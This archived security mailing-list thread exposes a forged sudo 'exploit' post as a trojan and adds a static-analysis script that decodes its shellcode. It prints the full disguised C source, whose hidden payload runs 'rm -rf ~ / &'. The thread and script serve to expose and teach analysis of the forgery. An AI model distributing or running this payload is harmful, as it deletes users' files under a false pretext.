Open Source and information security mailing list archives
Message-ID: <Pine.LNX.4.58.0507302305030.2272@wvz-jiyna.cvpx.pynhfvat.hf>
Date: Sun Jul 31 12:18:28 2005
From: jclausing at isc.sans.org (Jim Clausing)
Subject: Undisclosed Sudo Vulnerability ?

Yeah, and having talked to Joel, it was a pretty good forgery.  I'm pretty
sure he doesn't use Lotus for his e-mail client and I know he wouldn't be
sending to the list from ee.fju.edu.tw (140.136.145.2).

-- 
Jim Clausing
GCFA, GCIA, GCFW, GREM, CISSP, CCSA
GPG fingerprint = 30CE 6C98 E795 39FF 6E57 220B 342E E25C 852F 302B

On or about Sat, 30 Jul 2005, Kurt Seifried pontificated thusly:

> This is a trojan that will nuke all the files owned by the user running it.
>
> -Kurt
>
> ----- Original Message -----
> From: "Esler, Joel - Contractor" <joel.esler@...rt-s.army.mil>
> To: <full-disclosure@...ts.grok.org.uk>
> Sent: Saturday, July 30, 2005 12:40 PM
> Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?
>
>
> > About two weeks ago, our proprietary LIDS detected some suspicious shell
> > activity on an internal .mil machine I am in charge of. Our server runs
> > latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
> > Before shutting down the machine and reinstalling it from scratch, we
> > installed sebek module to monitor all shell activity. Based on the data
> > we gathered, it seems the attacker gained root privileges using an
> > undisclosed bug in latest sudo.
> >
> > $ uname -a
> > Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 GNU/Linux
> >
> > $ sudo -V
> > Sudo version 1.6.8p9
> >
> > $ ls -al /tmp/.phc
> > -rwsr-xr-x 1 root root 304873 Jul 05 03:45 /tmp/.phc
> >
> > Here is an excerpt of a shell session we recorded:
> >
> > <.........>
> > $ cat >blaat.uue<<'EH'
> >
> > --------------------------------------------------------------------------------
> >
> > EH
> > $ uudecode blaat.uue
> > $ cat sudoh.c
> > /*
> >  * off by one ebp overwrite in sudo prompt parsing func (bground mode only)
> >  *
> >  * "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard Johnson
> >  *
> >  * gcc -pipe -o sudoh sudoh.c ; ./sudoh
> >  *
> >  * happy deathday route
> >  *
> >  */
> >
> > #include <stdio.h>
> > #include <unistd.h>
> > #include <string.h>
> > #include <alloca.h>
> >
> >
> > #define SUDO_PROMPT "%u@%h> \\%"
> > #define shellcode esp
> > #define RETS_NUM 246 /* generic */
> > #define NOPS_NUM 116 /* generic */
> >
> >
> > /*
> >  * Linux x86 non-interactive exec
> >  * {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
> >  */
> >
> > char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
> > = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
> >   "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
> >   "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
> >   "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
> >   "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
> >   "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
> >   "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
> >   "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
> > /* = "\xcc\xeb\xfe"; */
> >
> >
> >
> > void fill (char *buff, int size, unsigned long val)
> > {
> >   unsigned long *ptr = (unsigned long *) buff;
> >
> >   for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = val;
> > }
> >
> >
> > unsigned long get_sp (void)
> > {
> >   __asm__ ("lea esp, %eax");
> > }
> >
> >
> > char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
> > {
> >   int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen (shellcode);
> >   unsigned char *nops = alloca (nops_nums);
> >   unsigned char *rets = alloca (rets_nums);
> >   unsigned long ret = get_sp ();
> >   static char exp_buffer [8192];
> >
> >   /* make sure sudo isatty() fails */
> >   close (0); close (1); close (2);
> >
> >   fill (nops, (unsigned char) nops_nums, 0x90909090);
> >   fill (rets, (unsigned char) rets_nums, ret);
> >
> >   /* be nice plz */
> >   if (size > sizeof (exp_buffer)) {
> >     fprintf (stderr, "buffer's t00 small..\n");
> >     return NULL;
> >   }
> >
> >   snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
> >             SUDO_PROMPT, /* evilz prompt */
> >             nops,
> >             shellcode,
> >             rets);
> >
> >   /* exploit buff */
> >   return exp_buffer;
> > }
> >
> >
> >
> > int main(int argv, char *argc[])
> > {
> >   char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);
> >
> >   /* thanks again T0dd :) */
> >
> >   execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit,
> >          "/bin/false", NULL);
> >
> >   /* ok, shellroot should await you @ "HISTFILE=/dev/null /tmp/.phc -p" */
> >
> >   return 0;
> > }
> >
> > $ gcc -pipe -o sudoh sudoh.c
> > {standard input}: Assembler messages:
> > {standard input}:5: Warning: Ignoring changed section attributes for .text
> > $ ./sudoh
> > $ cat /bin/cat > blaat.uue; rm blaat.uue
> > $ cat /bin/cat > sudoh.c; rm sudoh.c
> > $ cat /bin/cat > sudoh; rm sudoh
> > $ HISTFILE=/dev/null /tmp/.phc -p
> > id
> > uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
> > <.........>
> >
> >
> > Todd Miller, the maintainer of Sudo, has been informed yesterday, and it
> > is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.
> >
> >
> > J
> >
> > Joel Esler, GCIA
> > joel.esler@...rt-s.army.mil
> > 706-791-7165 DSN: 780-7165
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
>
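The point of the thread is that the "exploit" is a trojan: the C source comments and the visible "cp -p /bin/sh /tmp/.phc" string describe one thing, and the shellcode does another. The check a practitioner wants before compiling anything like this is a static look at the bytes. The script below is an added example for this page, not part of the message, of sudo, or of any tool named above. It copies the string-literal pieces of the `esp[]` array exactly as they appear in the quoted sudoh.c (the only input it needs), unescapes them the way a C compiler would, lists the `int 0x80` syscalls, extracts printable strings (which only shows the decoy), and then rebuilds the buffer the payload constructs on the stack with a run of `push imm32` followed by `push esp; pop esi` and `not dword [esi+disp]`. That rebuilt buffer is the string actually passed to `/bin/sh -c`. The syscall-name table is a small constructed subset of the i386 numbers; nothing here executes the shellcode.

```python
"""Static triage of the shellcode in the forged 'sudoh.c' quoted above.

Added example for this archive page; it is not code from the message,
from sudo, or from any named tool. Nothing here executes the payload.
"""
import re

# Copy of the string-literal pieces from the message's `esp[]` array, kept
# as separate pieces exactly as the C compiler sees adjacent literals.
SHELLCODE_PIECES = [
    r"\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68",
    r"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99",
    r"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7",
    r"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56",
    r"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31",
    r"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69",
    r"\x6e\x2f\x73\x68\x00\x2d\x63\x00",
    r"cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;",
]

# Constructed subset of i386 syscall numbers for triage output; anything
# not listed is reported by number only.
SYSCALL_NAMES = {1: "exit", 5: "open", 11: "execve", 15: "chmod", 23: "setuid"}


def c_literal_to_bytes(pieces):
    """Unescape two-digit \\xNN escapes (the only kind used here); every other
    character is taken literally. Pieces are decoded separately so a piece
    ending in \\x00 cannot swallow hex-looking text from the next piece."""
    out = bytearray()
    for piece in pieces:
        for tok in re.finditer(r"\\x([0-9a-fA-F]{2})|(.)", piece, re.DOTALL):
            out.append(int(tok.group(1), 16) if tok.group(1) else ord(tok.group(2)))
    return bytes(out)


def find_syscalls(code):
    """Every `int 0x80` (cd 80) with the number loaded right before it by
    `mov al, imm8` (b0 NN) or `mov eax, imm32` (b8 NN NN NN NN)."""
    found = []
    for m in re.finditer(rb"\xcd\x80", code):
        p = m.start()
        if p >= 2 and code[p - 2] == 0xB0:
            num = code[p - 1]
        elif p >= 5 and code[p - 5] == 0xB8:
            num = int.from_bytes(code[p - 4:p], "little")
        else:
            num = None
        found.append((num, SYSCALL_NAMES.get(num, "?")))
    return found


def printable_strings(code, min_len=4):
    """Same idea as strings(1): runs of printable ASCII. Runs of push/pop
    opcodes can show up as junk, so read the list critically."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, code)]


def recover_stack_string(code):
    """Rebuild the buffer a run of `push imm32` lays out in memory, applying
    any `not dword [esi+disp]` that follows `push esp; pop esi`. The last
    push lands at the lowest address, so memory order is the reverse of
    push order. Returns the NUL-terminated string at the start of it."""
    m = re.search(rb"(?:\x68.{4}){2,}", code, re.DOTALL)
    if not m:
        return ""
    run = m.group(0)
    pushes = [run[i + 1:i + 5] for i in range(0, len(run), 5)]
    mem = bytearray(b"".join(reversed(pushes)))
    pos = m.end()
    if code[pos:pos + 2] == b"\x54\x5e":            # push esp; pop esi
        pos += 2
        while True:
            if code[pos:pos + 2] == b"\xf7\x16":    # not dword [esi]
                disp, pos = 0, pos + 2
            elif code[pos:pos + 2] == b"\xf7\x56":  # not dword [esi+disp8]
                disp, pos = code[pos + 2], pos + 3
            else:
                break
            for i in range(disp, min(disp + 4, len(mem))):
                mem[i] ^= 0xFF
    return mem.split(b"\0", 1)[0].decode("latin-1")


SHELLCODE = c_literal_to_bytes(SHELLCODE_PIECES)

if __name__ == "__main__":
    print("length:", len(SHELLCODE))
    print("syscalls:", find_syscalls(SHELLCODE))
    print("visible strings:", printable_strings(SHELLCODE))
    print("stack-built argument:", repr(recover_stack_string(SHELLCODE)))
```

Run as a script it reports one syscall, execve, the decoy strings "/bin/sh" and "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;", and the argument rebuilt from the four NOT-obfuscated pushes, "rm -rf ~ / &", which is exactly the behaviour Kurt describes. The `jmp`/`call` pair at the start and end of the blob (eb 3e ... e8 bd ff ff ff) is the usual trick that leaves the address of "/bin/sh" in ebx; the visible copy-and-chmod string is never referenced by the code, it is there to be read by a human.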